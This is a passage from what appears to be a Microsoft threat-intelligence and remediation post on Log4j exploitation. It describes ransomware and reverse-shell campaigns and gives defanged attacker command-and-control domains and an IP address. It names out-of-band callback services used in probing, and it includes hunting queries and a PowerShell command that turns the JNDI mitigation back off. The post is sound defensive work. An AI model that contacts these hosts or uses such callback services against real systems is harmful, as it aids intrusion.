hands-on-keyboard attacks. In addition to the Cobalt Strike and PowerShell reverse shells seen in earlier reports, we\u2019ve also seen Meterpreter, Bladabindi, and HabitsRAT. Follow-on activities from these shells have not been observed at this time, but these tools have the ability to steal passwords and move laterally.\n\nThis activity is split between a percentage of small-scale campaigns that may be more targeted or related to testing, and the addition of CVE-2021-44428 to existing campaigns that were exploiting vulnerabilities to drop remote access tools. In the HabitsRAT case, the campaign was seen overlapping with infrastructure used in prior campaigns.\n\n### Webtoos\n\nThe Webtoos malware has DDoS capabilities and persistence mechanisms that could allow an attacker to perform additional activities. As reported by [RiskIQ](<https://community.riskiq.com/article/67ba1386>), Microsoft has seen Webtoos being deployed via the vulnerability. Attackers\u2019 use of this malware or intent is not known at this time, but the campaign and infrastructure have been in use and have been targeting both Linux and Windows systems prior to this vulnerability.\n\n### A note on testing services and assumed benign activity\n\nWhile services such as _interact.sh_, _canarytokens.org_, _burpsuite_, and _dnslog.cn_ may be used by IT organizations to profile their own threat footprints, Microsoft encourages including these services in your hunting queries and validating observations of these in environments to ensure they are intentional and legitimate activity.\n\n### Exploitation in internet-facing systems leads to ransomware\n\nAs early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware.\n\nThese attacks are performed by a China-based ransomware operator that we\u2019re tracking as DEV-0401. DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).\n\nBased on our analysis, the attackers are using command and control (CnC) servers that spoof legitimate domains. These include service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203.\n\n### Attackers propagating Log4j attacks via previously undisclosed vulnerability\n\nDuring our sustained monitoring of threats taking advantage of the Log4j 2 vulnerabilities, we observed activity related to attacks being propagated via a previously undisclosed vulnerability in the SolarWinds Serv-U software. We discovered that the vulnerability, now tracked as [CVE-2021-35247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35247>), is an input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation.\n\nWe reported our discovery to SolarWinds, and we\u2019d like to thank their teams for immediately investigating and working to remediate the vulnerability. We strongly recommend affected customers to apply security updates released by referring to the SolarWinds advisory here: <https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35247>. \n\nMicrosoft customers can use threat and vulnerability management in Microsoft Defender for Endpoint to identify and remediate devices that have this vulnerability. In addition, Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect malicious behavior related to the observed activity.\n\n## Finding and remediating vulnerable apps and systems\n\n### Threat and vulnerability management\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in Microsoft Defender for Endpoint monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities.\n\n#### Discovering affected components, software, and devices via a unified Log4j dashboard\n\nThreat and vulnerability management automatically and seamlessly identifies devices affected by the Log4j vulnerabilities and the associated risk in the environment and significantly reduces time-to-mitigate.\n\nThe wide use of Log4j across many supplier\u2019s products challenge defender teams to mitigate and address the risks posed by the vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) or [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)). The threat and vulnerability management capabilities within Microsoft 365 Defender can help identify vulnerable installations. On December 15, we began rolling out updates to provide a consolidated view of the organizational exposure to the Log4j 2 vulnerabilities\u2014on the device, software, and vulnerable component level\u2014through a range of automated, complementing capabilities. These capabilities are supported on Windows 10, Windows 11, and Windows Server 2008, 2012, and 2016. They are also supported on Linux, but they require updating the Microsoft Defender for Endpoint Linux client to version 101.52.57 (30.121092.15257.0) or later. The updates include the following:\n\n * Discovery of vulnerable Log4j library components (paths) on devices\n * Discovery of vulnerable installed applications that contain the Log4j library on devices\n * A [dedicated Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>) that provides a consolidated view of various findings across vulnerable devices, vulnerable software, and vulnerable files\n * Introduction of a new schema in advanced hunting, **DeviceTvmSoftwareEvidenceBeta**, which surfaces file-level findings from the disk and provides the ability to correlate them with additional context in advanced hunting:\n \n \n DeviceTvmSoftwareEvidenceBeta\n | mv-expand DiskPaths\n | where DiskPaths contains \"log4j\"\n | project DeviceId, SoftwareName, SoftwareVendor, SoftwareVersion, DiskPaths\n\nTo complement this new table, the existing **DeviceTvmSoftwareVulnerabilities** table in advanced hunting can be used to identify vulnerabilities in installed software on devices:\n \n \n DeviceTvmSoftwareVulnerabilities \n | where CveId in (\"CVE-2021-44228\", \"CVE-2021-45046\")\n\nThese new capabilities integrate with the existing threat and vulnerability management experience and are gradually rolling out. As of December 27, 2021, discovery is based on installed application CPEs that are known to be vulnerable to Log4j RCE, as well as the presence of vulnerable Log4j Java Archive (JAR) files. Cases where Log4j is packaged into an Uber-JAR or shaded are currently not discoverable, but support for discovery of these instances and other packaging methods is in development. Support for macOS is also in progress and will roll out soon.\n\n\n\n_Figure 1. Threat and Vulnerability recommendation __\u201cAttention required: Devices found with vulnerable Apache Log4j versions\u201d_\n\nOn the Microsoft 365 Defender portal, go to **Vulnerability management** &gt; **Dashboard** &gt; **Threat awareness**, then click **View vulnerability details** to see the consolidated view of organizational exposure to the Log4j 2 vulnerability (for example, CVE-2021-44228 dashboard, as shown in the following screenshots) on the device, software, and vulnerable component level.\n\n\n\n_Figure 2. Threat and vulnerability management dedicated CVE-2021-44228 dashboard_\n\n\n\n_Figure 3. Threat and vulnerability management finds exposed paths_\n\n\n\n_Figure 4. Threat and vulnerability management finds exposed devices based on vulnerable software and vulnerable files detected on disk_\n\nNote: Scan results may take some time to reach full coverage, and the number of discovered devices may be low at first but will grow as the scan reaches more devices. A regularly updated list of vulnerable products can be viewed in the Microsoft 365 Defender portal with matching recommendations. We will continue to review and update this list as new information becomes available.\n\nThrough [device discovery](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/unmanaged-device-protection-capabilities-are-now-generally/ba-p/2463796>), unmanaged devices with products and services affected by the vulnerabilities are also surfaced so they can be onboarded and secured.\n\n\n\n_Figure 5. Finding vulnerable applications and devices via software inventory_\n\n#### Applying mitigation directly in the Microsoft 365 Defender portal\n\nWe have released two new threat and vulnerability management capabilities that can significantly simplify the process of turning off JNDI lookup, a workaround that can prevent the exploitation of the Log4j vulnerabilities on most devices, using an environment variable called LOG4J_FORMAT_MSG_NO_LOOKUPS. These new capabilities provide security teams with the following:\n\n 1. View the mitigation status for each affected device. This can help prioritize mitigation and/or patching of devices based on their mitigation status.\n\nTo use this feature, open the [Exposed devices tab](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/exposedDevices>) in the dedicated CVE-2021-44228 dashboard and review the **Mitigation status** column. Note that it may take a few hours for the updated mitigation status of a device to be reflected.\n\n\n\n_Figure 6. Viewing each device\u2019s mitigation status_\n\n 2. Apply the mitigation (that is, turn off JNDI lookup) on devices directly from the portal. This feature is currently available for Windows devices only.\n\nThe mitigation will be applied directly via the Microsoft Defender for Endpoint client. To view the mitigation options, click on the **Mitigation options** button in the [Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>):\n\n\n\nYou can choose to apply the mitigation to all exposed devices or select specific devices for which you would like to apply it. To complete the process and apply the mitigation on devices, click **Create mitigation action**.\n\n\n\n_Figure 7. Creating mitigation actions for exposed devices._\n\nIn cases where the mitigation needs to be reverted, follow these steps:\n\n 1. Open an elevated PowerShell window\n 2. Run the following command:\n \n \n [Environment]::SetEnvironmentVariable(\"LOG4J_FORMAT_MSG_NO_LOOKUPS\", $null, [EnvironmentVariableTarget]::Machine)\n\nThe change will take effect after the device restarts.\n\n### Microsoft 365 Defender advanced hunting\n\nAdvance hunting can also surface affected software. This query looks for possibly vulnerable applications using the affected Log4j component. Triage the results to determine applications and programs that may need to be patched and updated.\n \n \n DeviceTvmSoftwareInventory\n | where SoftwareName contains \"log4j\"\n | project DeviceName, SoftwareName, SoftwareVersion\n\n\n\n_Figure 8. Finding vulnerable software via advanced hunting_\n\n### Microsoft Defender for Cloud\n\n#### Microsoft Defender for servers\n\nOrganizations using Microsoft Defender for Cloud can use [Inventory tools](<https://docs.microsoft.com/azure/defender-for-cloud/asset-inventory>) to begin investigations before there\u2019s a CVE number. With Inventory tools, there are two ways to determine exposure across hybrid and multi-cloud resources:\n\n * Vulnerability assessment findings \u2013 Organizations who have enabled any of the vulnerability assessment tools (whether it&#x27;s Microsoft Defender for Endpoint&#x27;s [threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) module, the [built-in Qualys scanner](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-vm>), or a [bring your own license solution](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-byol-vm>)), they can search by CVE identifier:\n\n\n\n_Figure 9. Searching vulnerability assessment findings by CVE identifier_\n\n * Software inventory - With the combined [integration with Microsoft Defender for Endpoint](<https://docs.microsoft.com/azure/defender-for-cloud/integration-defender-for-endpoint>) and [Microsoft Defender for servers](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-servers-introduction>), organizations can search for resources by installed applications and discover resources running the vulnerable software:\n\n\n\n_Figure 10. Searching software inventory by installed applications_\n\nNote that this doesn\u2019t replace a search of your codebase. It\u2019s possible that software with integrated Log4j libraries won\u2019t appear in this list, but this is helpful in the initial triage of investigations related to this incident. For more information about how Microsoft Defender for Cloud finds machines affected by CVE-2021-44228, read this [tech community post](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/how-defender-for-cloud-finds-machines-affected-by-log4j/ba-p/3037271>).\n\n#### Microsoft Defender for Containers\n\nMicrosoft Defender for Containers is capable of discovering images affected by the vulnerabilities recently discovered in Log4j 2: [CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), and [CVE-2021-45105](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>). Images are automatically scanned for vulnerabilities in three different use cases: when pushed to an Azure container registry, when pulled from an Azure container registry, and when container images are running on a Kubernetes cluster. Additional information on supported scan triggers and Kubernetes clusters can be found [here](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-containers-introduction?tabs=defender-for-container-arch-aks>). \n\nLog4j binaries are discovered whether they are deployed via a package manager, copied to the image as stand-alone binaries, or included within a JAR Archive (up to one level of nesting). \n\nWe will continue to follow up on any additional developments and will update our detection capabilities if any additional vulnerabilities are reported.\n\n**Finding affected images**\n\nTo find vulnerable images across registries using the Azure portal, navigate to the **Microsoft Defender for Cloud** service under Azure Portal. Open the **Container Registry images should have vulnerability findings resolved** recommendation and search findings for the relevant CVEs. \n\n\n\n_Figure 11. Finding images with the CVE-2021-45046 vulnerability_ \n\n**Find vulnerable running images on Azure portal [preview] **\n\nTo view only vulnerable images that are currently running on a Kubernetes cluster using the Azure portal, navigate to the **Microsoft Defender for Cloud** service under Azure Portal. Open the **Vulnerabilities in running container images should be remediated (powered by Qualys)** recommendation and search findings for the relevant CVEs: \n\n\n\n_Figure 12. Finding running images with the CVE-2021-45046 vulnerability _\n\nNote: This recommendation requires clusters to run Microsoft Defender security profile to provide visibility on running images.\n\n**Search Azure Resource Graph data ******\n\nAzure Resource Graph (ARG) provides instant access to resource information across cloud environments with robust filtering, grouping, and sorting capabilities. It&#x27;s a quick and efficient way to query information across Azure subscriptions programmatically or from within the Azure portal. ARG provides another way to query resource data for resources found to be affected by the Log4j vulnerability.\n\nThe following query finds resources affected by the Log4j vulnerability across subscriptions. Use the additional data field across all returned results to obtain details on vulnerable resources: \n \n \n securityresources \n | where type =~ \"microsoft.security/assessments/subassessments\"\n | extend assessmentKey=extract(@\"(?i)providers/Microsoft.Security/assessments/([^/]*)\", 1, id), subAssessmentId=tostring(properties.id), parentResourceId= extract(\"(.+)/providers/Microsoft.Security\", 1, id)\n | extend Props = parse_json(properties)\n | extend additionalData = Props.additionalData\n | extend cves = additionalData.cve\n | where isnotempty(cves) and array_length(cves) > 0\n | mv-expand cves\n | where tostring(cves) has \"CVE-2021-44228\" or tostring(cves) has \"CVE-2021-45046\" or tostring(cves) has \"CVE-2021-45105\" \n\n### Microsoft Sentinel queries\n\nMicrosoft Sentinel customers can use the following detection query to look for devices that have applications with the vulnerability:\n\n * [Vulnerable machines related to Log4j CVE-2021-44228](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityNestedRecommendation/Log4jVulnerableMachines.yaml>)\n\nThis query uses the Microsoft Defender for Cloud nested recommendations data to find machines vulnerable to Log4j CVE-2021-44228.\n\nMicrosoft Sentinel also provides a CVE-2021-44228 Log4Shell Research Lab Environment for testing the vulnerability: <https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell>\n\n### RiskIQ EASM and Threat Intelligence\n\nRiskIQ has published a few threat intelligence articles on this CVE, with mitigation guidance and IOCs. The latest one with links to previous articles can be found [here](<https://community.riskiq.com/article/67ba1386>). Both Community users and enterprise customers can search within the threat intelligence portal for data about potentially vulnerable components exposed to the Internet. For example, it&#x27;s possible to [surface all observed instances of Apache](<https://community.riskiq.com/search/components?category=Server&query=Apache>) or [Java](<https://community.riskiq.com/research?query=java>), including specific versions. Leverage this method of exploration to aid in understanding the larger Internet exposure, while also filtering down to what may impact you. \n\nFor a more automated method, registered users can view their attack surface to understand tailored findings associated with their organization. Note, you must be registered with a corporate email and the automated attack surface will be limited. Digital Footprint customers can immediately understand what may be vulnerable and act swiftly and resolutely using the [Attack Surface Intelligence Dashboard](<https://app.riskiq.net/a/main/index#/dashboards/379/RiskIQ%20Attack%20Intelligence%20Dashboard>) Log4J Insights tab. \n\n## Detecting and responding to exploitation attempts and other related attacker activity\n\n### Microsoft 365 Defender\n\nMicrosoft 365 Defender co